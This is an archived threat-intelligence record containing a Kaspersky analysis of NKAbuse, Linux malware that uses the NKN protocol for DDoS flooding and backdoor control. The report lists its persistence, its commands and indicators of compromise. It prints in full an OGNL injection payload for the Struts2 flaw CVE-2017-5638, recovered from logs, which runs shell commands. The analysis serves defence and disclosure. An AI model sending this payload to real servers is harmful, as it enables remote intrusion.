{ "id": "e9c159af-0e7a-4cc5-80ab-44d23b9f9e8e", "created_at": "2026-04-06T00:16:41.430465Z", "updated_at": "2026-04-10T03:24:29.403005Z", "deleted_at": null, "sha1_hash": "daebaf0e378fc11ad510c22584e45580cf068611", "title": "Unveiling NKAbuse: a new multiplatform threat abusing the NKN protocol", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 286979, "plain_text": "Unveiling NKAbuse: a new multiplatform threat abusing the NKN\r\nprotocol\r\nBy Kaspersky GERT\r\nPublished: 2023-12-14 · Archived: 2026-04-05 22:36:22 UTC\r\nDuring an incident response performed by Kaspersky’s Global Emergency Response Team (GERT) and GReAT,\r\nwe uncovered a novel multiplatform threat named “NKAbuse”. The malware utilizes NKN technology for data\r\nexchange between peers, functioning as a potent implant, and equipped with both flooder and backdoor\r\ncapabilities. Written in Go, it is flexible enough to generate binaries compatible with various architectures.\r\nOur analysis suggests that the primary target of NKAbuse is Linux desktops. However, in view of its ability to\r\ninfect MIPS and ARM systems, it also poses a threat to IoT devices.\r\nNKAbuse infiltrates systems by uploading an implant to the victim host. The malware establishes persistence\r\nthrough a cron job and installs itself in the host’s home folder. Its capabilities span flooding to backdoor access to\r\nremote administration (RAT), offering a range of features.\r\nA new kind of network\r\nNKN, short for “New Kind of Network”, functions as a peer-to-peer (P2P) and blockchain-oriented network\r\nprotocol that prioritizes decentralization and privacy. The NKN network currently has more than 180,000 official\r\nnodes. It offers diverse routing algorithms designed to optimize data transmission by selecting the shortest node\r\ntrajectory to reach its intended destination.\r\nNKN data routing diagram\r\nhttps://securelist.com/unveiling-nkabuse/111512/\r\nPage 1 of 7\n\nHistorically, malware operators have exploited new and emerging communication protocols like NKN to link up\r\nwith their command-and-control servers (C2) or bot masters. This threat (ab)uses the NKN public blockchain\r\nprotocol to carry out a large set of flooding attacks and act as a backdoor inside Linux systems.\r\nA not-so-new attack vector\r\nEvidence collected and analyzed by GERT suggests that this attack exploited an old vulnerability related to\r\nStruts2 (CVE-2017-5638 – Apache Struts2), targeting a financial company.\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?\r\n(#_memberAccess=#dm):((#cont\r\nainer=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.g\r\netInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNam\r\nes().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(\r\n#req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest')).(#cmds=@java.n\r\net.URLDecoder@decode(#req.getHeader('shell'),'UTF-8')).(#cmd={'/bin / bash', ' - c',\r\n#cmds}).(#p = new java.lang.ProcessBuilder(#cmd)).(#p.redirectErrorStream(true)).(#process\r\n= #p.start()).(#ros =\r\n(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.c\r\nommons.io.IOUtils@copy(#process.getInputStream(), #ros))\r\nLog evidence obtained from the exploited WebService\r\nThe excerpt from the audit logs shown above is the same as that referenced in the vulhub POC S2-048. The\r\nvulnerability allows the attackers to execute commands on the server by passing the command in a header\r\nidentified as “shell” and sending the instructions to Bash for execution. After the vulnerability is exploited, a\r\ncommand is executed on the system to download the initial script.\r\nA new multiplatform implant\r\nThe malware is typically installed on the victim’s device by executing a remote shell script that downloads and\r\nexecutes the contents of the setup.sh shell script hosted by the attacker remotely. The setup process checks the OS\r\ntype and, depending on that, it downloads the second stage, which is the actual malware implant. The implant is\r\ndownloaded from the same server; it is named “app_linux_{ARCH}”, where “{ARCH}” is the target OS\r\narchitecture. The downloaded implant is placed into the temporary /tmp directory and then executed. There are\r\neight architectures hosted on that server and supported by the malware:\r\nhttps://securelist.com/unveiling-nkabuse/111512/\r\nPage 2 of 7\n\n386\r\narm64\r\narm\r\namd64\r\nmips\r\nmipsel\r\nmips64\r\nmips64el\r\nThis analysis will focus on the amd64 (x86-64) version.\r\nOnce executed, the malware checks if it is the only instance running and moves itself to a safe place instead of\r\nremaining in the volatile /tmp directory. The directory chosen by the implant to reside in is\r\n/root/.config/StoreService/. Another set of directories created inside that destination path is files and .cache. Then\r\nthe implant retrieves the infected machine’s IP address by sending a GET request to ifconfig.me, loads the default\r\nconfiguration, which checks if it is located inside the .cache directory and, if not, loads certain hardcoded settings.\r\nLoading and setting up the default configuration\r\nhttps://securelist.com/unveiling-nkabuse/111512/\r\nPage 3 of 7\n\nThis configuration is then saved to a new cache structure, which holds other important repeatedly reused settings,\r\nsuch as the generated private key.\r\nNKAbuse makes use of cron jobs to survive reboots. To achieve that, it needs to be root. It checks that the current\r\nuser ID is 0 and, if so, proceeds to parse the current crontab, adding itself for every reboot.\r\nA new communication\r\nNKAbuse utilizes the NKN protocol to communicate with the bot master and receive/send information. To do this,\r\nthe malware implant creates a new account and a new multiclient, which enables it to send and receive data from\r\nmultiple clients concurrently, increasing the reliability of its communications with the bot master.\r\nThe NKN account is created with the default config options, and then the multiclient is initialized with an\r\nidentifier which in our sample is a 64 character string representing the public key and remote address used by\r\nthe malware.\r\nNKAbuse setting up the NKN client structure with the help of a hardcoded public key\r\nAs soon as the client is set up and ready to receive and send data, the malware establishes a handler to accept\r\nincoming messages sent by the bot master. The handler contains 42 or so cases, each performing different actions\r\ndepending on the “code” sent, and waits for more messages to arrive.\r\nNKAbuse contains a large arsenal of Distributed Denial of Service (DDoS) attacks. Below is a list of the flooding\r\npayloads.\r\nhttps://securelist.com/unveiling-nkabuse/111512/\r\nPage 4 of 7\n\nCommand Attack\r\nDefault/0 http_flood_HTTPGetFloodPayload\r\n1 http_flood_HTTPPostFloodPayload\r\n2 tcp_flood_TCPFloodPayload\r\n3 udp_flood_UDPFloodPayload\r\n4 ping_flood_PINGFloodPayload\r\n5 tcp_syn_flood_TCPSynFloodPayload\r\n6 ssl_flood_SSLFloodPayload\r\n7 http_slowloris_HTTPSlowlorisPayload\r\n8 http_slow_body_HTTPSlowBodyPayload\r\n9 http_slow_read_HTTPSlowReadPayload\r\n10 icmp_flood_ICMPFloodPayload\r\n11 dns_nxdomain_DNSNXDOMAINPayload\r\nAll these payloads historically have been used by botnets, so, when combined with the NKN as the\r\ncommunication protocol, the malware can asynchronously wait for the master to launch a combined attack. It is\r\nimportant to note that the last type of payload attack diverts from the others. NKAbuse overflows a DNS server\r\nwith junk DNS requests (type AAAA), causing it to try to resolve “{JUNK}.google.com” subdomains, where\r\n{JUNK} is a randomly generated subdomain name in the 0-9a-zA-Z format.\r\nA new backdoor with RAT capabilities\r\nNKAbuse has multiple features that turn it into a powerful backdoor or a remote access trojan (RAT), not just a\r\nDDoS tool. In fact, most of the message commands mentioned above are, in one way or another, used for\r\npersistence, command execution, or information gathering.\r\nThe malware implant establishes a structure named “Heartbeat”, which talks to the bot master at regular\r\nintervals. It contains a number of other structures that store information about the infected host: the PID, the\r\nvictim’s IP address, free memory, current configuration, and so on.\r\nAnother feature of this malware is the ability to make screenshots of the infected machine. It uses an open-source\r\nproject to determine the display bounds and then capture an image of the current screen, in order to convert it to\r\nPNG and send to the bot master.\r\nhttps://securelist.com/unveiling-nkabuse/111512/\r\nPage 5 of 7\n\nCapturing screenshots\r\nNKAbuse can also create files with specific content, remove files from the file system, and fetch a file list from a\r\nspecific path. It can get a list of processes running in the system and even a detailed list of the available network\r\ninterfaces. Another common feature that makes this implant a full-fledged backdoor is the ability to run system\r\ncommands. These are executed on behalf of the current user, and the output is sent via NKN to the botmaster.\r\nA new threat\r\nAlthough relatively rare, new cross-platform flooders and backdoors like NKAbuse stand out through their\r\nutilization of less common communication protocols. This particular implant appears to have been meticulously\r\ncrafted for integration into a botnet, yet it can adapt to functioning as a backdoor in a specific host. Moreover, its\r\nuse of blockchain technology ensures both reliability and anonymity, which indicates the potential for this botnet\r\nto expand steadily over time, seemingly devoid of an identifiable central controller.\r\nAdditionally, it was confirmed that the malware has no self-propagation functionality, which means the initial\r\ninfection vector is delivered by someone who exploits a vulnerability to deploy the sample.\r\nOur telemetry data shows that there are victims in Colombia, Mexico, and Vietnam. All Kaspersky products detect\r\nthe threat as HEUR:Backdoor.Linux.NKAbuse.a.\r\nA more detailed analysis of the latest NKAbuse versions is available to customers of our private Threat\r\nIntelligence Reports. With any requests on the subject, please contact crimewareintel@kaspersky.com.\r\nIndicators of compromise\r\nHost-based:\r\nMD5: 11e2d7a8d678cd72e6e5286ccfb4c833\r\nFiles created:\r\n/root/.config/StoreService\r\n/root/.config/StoreService/app_linux_amd64\r\n/root/.config/StoreService/files\r\n/root/.config/StoreService/.cache\r\nhttps://securelist.com/unveiling-nkabuse/111512/\r\nPage 6 of 7\n\nSource: https://securelist.com/unveiling-nkabuse/111512/\r\nhttps://securelist.com/unveiling-nkabuse/111512/\r\nPage 7 of 7", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "references": [ "https://securelist.com/unveiling-nkabuse/111512/" ], "report_names": [ "111512" ], "threat_actors": [ { "id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2", "created_at": "2022-10-25T16:07:24.471018Z", "updated_at": "2026-04-10T02:00:05.002374Z", "deleted_at": null, "main_name": "Cron", "aliases": [], "source_name": "ETDA:Cron", "tools": [ "Catelites", "Catelites Bot", "CronBot", "TinyZBot" ], "source_id": "ETDA", "reports": null }, { "id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d", "created_at": "2022-10-25T16:07:24.139848Z", "updated_at": "2026-04-10T02:00:04.878798Z", "deleted_at": null, "main_name": "Safe", "aliases": [], "source_name": "ETDA:Safe", "tools": [ "DebugView", "LZ77", "OpenDoc", "SafeDisk", "TypeConfig", "UPXShell", "UsbDoc", "UsbExe" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434601, "ts_updated_at": 1775791469, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/daebaf0e378fc11ad510c22584e45580cf068611.pdf", "text": "https://archive.orkl.eu/daebaf0e378fc11ad510c22584e45580cf068611.txt", "img": "https://archive.orkl.eu/daebaf0e378fc11ad510c22584e45580cf068611.jpg" } }